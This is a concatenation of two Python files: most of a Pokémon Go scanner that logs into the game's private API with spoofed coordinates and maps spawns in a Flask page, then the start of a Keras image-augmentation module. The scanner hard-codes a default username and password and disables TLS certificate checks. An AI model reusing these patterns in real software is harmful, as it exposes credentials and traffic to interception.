alt = loc.altitude
sysprint('[!] Your given location: {}'.format(loc.address.encode('utf-8')))
sysprint('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
global global_parent_pid
while True:
if global_parent_pid is not None:
if not is_running(global_parent_pid):
return
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
sysprint('REQUEST:')
sysprint(p_req)
sysprint('Response:')
sysprint(p_ret)
sysprint('''
''')
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
sysprint('[!] Google login for: {}'.format(username))
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
sysprint('[!] PTC login for: {}'.format(username))
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
sysprint('[!] Trimming password to 15 characters')
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
sysprint(r1.json()['errors'][0])
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', default='mrliputo', required=False)
parser.add_argument('-p', '--password', help='Password', default='qwe123qwe', required=False)
parser.add_argument('-t', '--token', help='SSO Token', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=True)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=True)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=1200)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.add_argument(
'-pid', '--parent_pid', help='Parent PID', default=None)
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password and not args.token:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
if args.token:
access_token = args.token
else:
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
sysprint('[+] RPC Session Token: {} ...'.format(access_token[:25]))
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
sysprint('[+] Received API endpoint: {}'.format(api_endpoint))
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
sysprint('[+] Login successful')
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
sysprint('[+] Username: {}'.format(profile.profile.username))
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
sysprint('[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S')))
for curr in profile.profile.currency:
sysprint('[+] {}: {}'.format(curr.type, curr.amount))
return api_endpoint, access_token, profile_response
def main():
me = singleton.SingleInstance('pokemap')
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
sysprint('[!] Invalid Auth service specified')
return
sysprint('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
sysprint('[!] DEBUG mode on')
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
sysprint('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
if args.parent_pid:
global global_parent_pid
global_parent_pid = int(args.parent_pid)
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
if global_parent_pid is not None:
if not is_running(global_parent_pid):
return
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
sysprint('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
sysprint('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
sysprint('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId;
if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
sysprint ("[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng']))
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
#if not werkzeug.serving.is_running_from_reloader():
# debug(
# 'register_background_thread: not running inside Flask so not starting thread')
# return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
sysprint('[-] Invalid next location: %s,%s' % (lat, lon))
else:
sysprint('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
pokestop = {
'lat': stop[0],
'lng': stop[1]
}
if stop[2] > 0:
disappear_time = time.mktime(datetime.strptime(time.strftime("%d/%m/%Y") + ' ' + stop[2], "%d/%m/%Y %H:%M:%S").timetuple())
pokestop['expire_time'] = disappear_time
pokestop['expire_time_formatted'] = stop[2]
LABEL_TMPL = u'''
<div><b>Lured Pokestop</b><span></div>
<div>Lure expires at - {expire_time_formatted} <span class='label-countdown' disappears-at='{expire_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokestop)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': pokestop['lat'],
'lng': pokestop['lng'],
'infobox': label,
})
else:
LABEL_TMPL = u'''
<div><b>Pokestop</b><span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
<div><small>{lat}, {lng}</small></div>
'''
label = LABEL_TMPL.format(**pokestop)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': pokestop['lat'],
'lng': pokestop['lng'],
'infobox': label,
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
def monitor_parent_process():
if args.parent_pid is None:
return
while is_running(int(args.parent_pid)):
time.sleep(1)
sysprint('Parent process shutdown')
func = flask.request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
sys.exit(0)
return
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
if __name__ == '__main__':
args = get_args()
threading.Thread(target=monitor_parent_process).start()
register_background_thread(initial_registration=True)
app.run(debug=False, threaded=True, host=args.host, port=args.port)
|
mutil_processing_image_generator_balance.py
|
"""Fairly basic set of tools for real-time data augmentation on image data.
Can easily be extended to include new transformations,
new preprocessing methods, etc...
"""
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import re
from scipy import linalg
import scipy.ndimage as ndi
from six.moves import range
import os
import threading
import warnings
from os import listdir
import json
import random
import sys
import cv2
import logging
import argparse
from PIL import Image
import glob
import keras
from queue import Queue
import time
import pdb
# from .. import backend as K
import keras.backend as K
try:
from PIL import Image as pil_image
pil_image.MAX_IMAGE_PIXELS = None
except ImportError:
pil_image = None
def extract_foreground_mask(img, threshold=0.75, dilate_kernel=2):
"""
Func: Get a gray image from slide
Args: img
Returns:gray_t
"""
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (dilate_kernel, dilate_kernel))
# Convert color space
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, gray_t = cv2.threshold(gray, threshold * 255, 255, cv2.THRESH_BINARY_INV)
gray_t = cv2.dilate(gray_t, kernel)
ret, gray_t = cv2.threshold(gray_t, threshold * 255, 255, cv2.THRESH_BINARY)
return gray_t
def shuffle_list(list_to_be_shuffle, is_shuffle):
"""
Args:
list_to_be_shuffle: A list will be to shuffle.
is_shuffle: bool, if True, list will be shuffle, if False, list will remain the same.
Returns:
list_to_be_shuffle:
"""
if is_shuffle:
shuffled_index = list(range(len(list_to_be_shuffle)))
# random.seed(12345)
random.shuffle(shuffled_index)
list_to_be_shuffle = [list_to_be_shuffle[i] for i in shuffled_index]
return list_to_be_shuffle
def transform_list_to_array(array_list, shuffle=True):
"""
Func: transform [[image, label], [image, label], ...] to images: [batch_size, w, h, c] and labels: [batch_size, 1]
Args:
Returns:
"""
assert len(array_list) != 0, logger.info('no patches to extend!')
array_list_shuffle = shuffle_list(array_list, shuffle)
batch_images = np.expand_dims(array_list_shuffle[0][0], axis=0)
batch_labels = np.expand_dims(array_list_shuffle[0][1], axis=0)
for i in range(1, len(array_list_shuffle)):
batch_images = \
np.concatenate((batch_images, np.expand_dims(array_list_shuffle[i][0], axis=0)))
batch_labels = \
np.concatenate((batch_labels, np.expand_dims(array_list_shuffle[i][1], axis=0)))
return batch_images, batch_labels
def random_rotation(x, rg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random rotation of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Rotated Numpy image tensor.
"""
theta = np.pi / 180 * np.random.uniform(-rg, rg)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0],
[np.sin(theta), np.cos(theta), 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_shift(x, wrg, hrg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial shift of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
translation_matrix = np.array([[1, 0, tx],
[0, 1, ty],
[0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_shear(x, intensity, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial shear of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
intensity: Transformation intensity.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Sheared Numpy image tensor.
"""
shear = np.random.uniform(-intensity, intensity)
shear_matrix = np.array([[1, -np.sin(shear), 0],
[0, np.cos(shear), 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_zoom(x, zoom_range, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0.):
"""Performs a random spatial zoom of a Numpy image tensor.
# Arguments
x: Input tensor. Must be 3D.
zoom_range: Tuple of floats; zoom range for width and height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
# Returns
Zoomed Numpy image tensor.
# Raises
ValueError: if `zoom_range` isn't a tuple.
"""
if len(zoom_range) != 2:
raise ValueError('zoom_range should be a tuple or list of two floats. '
'Received arg: ', zoom_range)
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
zoom_matrix = np.array([[zx, 0, 0],
[0, zy, 0],
[0, 0, 1]])
h, w = x.shape[row_axis], x.shape[col_axis]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_axis, fill_mode, cval)
return x
def random_channel_shift(x, intensity, channel_axis=0):
x = np.rollaxis(x, channel_axis, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def transform_matrix_offset_center(matrix, x, y):
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_transform(x, transform_matrix, channel_axis=0, fill_mode='nearest', cval=0.):
x = np.rollaxis(x, channel_axis, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [ndi.interpolation.affine_transform(x_channel, final_affine_matrix,
final_offset, order=0, mode=fill_mode, cval=cval) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_axis + 1)
return x
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def standardize(x,
preprocessing_function=None,
rescale=None,
channel_axis=None,
samplewise_center=False,
featurewise_center=False,
samplewise_std_normalization=False,
featurewise_std_normalization=False,
mean=None,
std=None,
zca_whitening=False,
principal_components=None,
rng=None):
if preprocessing_function:
x = preprocessing_function(x)
if rescale:
x *= rescale
# x is a single image, so it doesn't have image number at index 0
img_channel_axis = channel_axis - 1
if samplewise_center:
x -= np.mean(x, axis=img_channel_axis, keepdims=True)
if samplewise_std_normalization:
x /= (np.std(x, axis=img_channel_axis, keepdims=True) + 1e-7)
if featurewise_center:
if mean is not None:
x -= mean
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_center`, but it hasn\'t'
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if featurewise_std_normalization:
if std is not None:
x /= (std + 1e-7)
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, but it hasn\'t'
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if zca_whitening:
if principal_components is not None:
flatx = np.reshape(x, (x.size))
whitex = np.dot(flatx, principal_components)
x = np.reshape(whitex, (x.shape[0], x.shape[1], x.shape[2]))
else:
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, but it hasn\'t'
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
return x
def random_transform(x,
row_axis=None,
col_axis=None,
channel_axis=None,
rotation_range=0.,
height_shift_range=0.,
width_shift_range=0.,
shear_range=0.,
zoom_range=0.,
fill_mode='nearest',
cval=0.,
channel_shift_range=0.,
horizontal_flip=False,
vertical_flip=False,
rng=None):
supplied_rngs = True
if rng is None:
supplied_rngs = False
rng = np.random
# x is a single image, so it doesn't have image number at index 0
img_row_axis = row_axis - 1
img_col_axis = col_axis - 1
img_channel_axis = channel_axis - 1
# use composition of homographies
# to generate final transform that needs to be applied
if rotation_range:
theta = np.pi / 180 * rng.uniform(-rotation_range, rotation_range)
else:
theta = 0
